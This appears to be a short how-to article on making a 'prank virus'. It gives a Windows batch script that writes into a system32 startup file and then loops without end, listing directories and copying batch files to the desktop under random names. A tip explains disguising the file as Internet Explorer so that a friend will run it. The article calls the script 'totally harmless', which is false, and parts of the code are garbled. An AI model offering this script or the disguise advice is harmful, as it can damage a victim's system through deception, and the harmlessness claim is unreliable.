Make a Funny Prank Virus

This is a totally harmless prank virus to pull on a friend or someone.

Steps

  1. Open notepad
  2. Type the following code in:

    • @echo off

    • echo checking system:

    • echo for %%i in ("*.bat") do copy %%i+c:\tmp.bat %%i #*>c:\windows\system32\autoexec.NT

    • echo VIRUS DETECTED

    • Pause

    • echo DELETING VIRUS

    • pause

    • :1

    • dir /s

    • copy c:\tmp.bat

    • c:\document~1\%username%\desktop\greatgame_%random%.bat

    • goto 1
  3. This will create a never ending stream of mindless code. This cannot be stopped easily.
  4. Save the file as "virus.bat"
  5. Have fun!

Tips

  • To stop the batch (the fake virus) from running, press Ctrl+C. Alternatively use the task manager or with vista, press the "x" button.
  • You can make the virus look convincing by changing its name and Icon.
    • One way to do that is simply rename the file. Then right click the icon and click "properties". Then look for the icon you want. You might use the internet explorer icon and name it "Internet Explorer". You do need a shortcut to change the icon though. Just make a shortcut then change the icon in properties.

Related Articles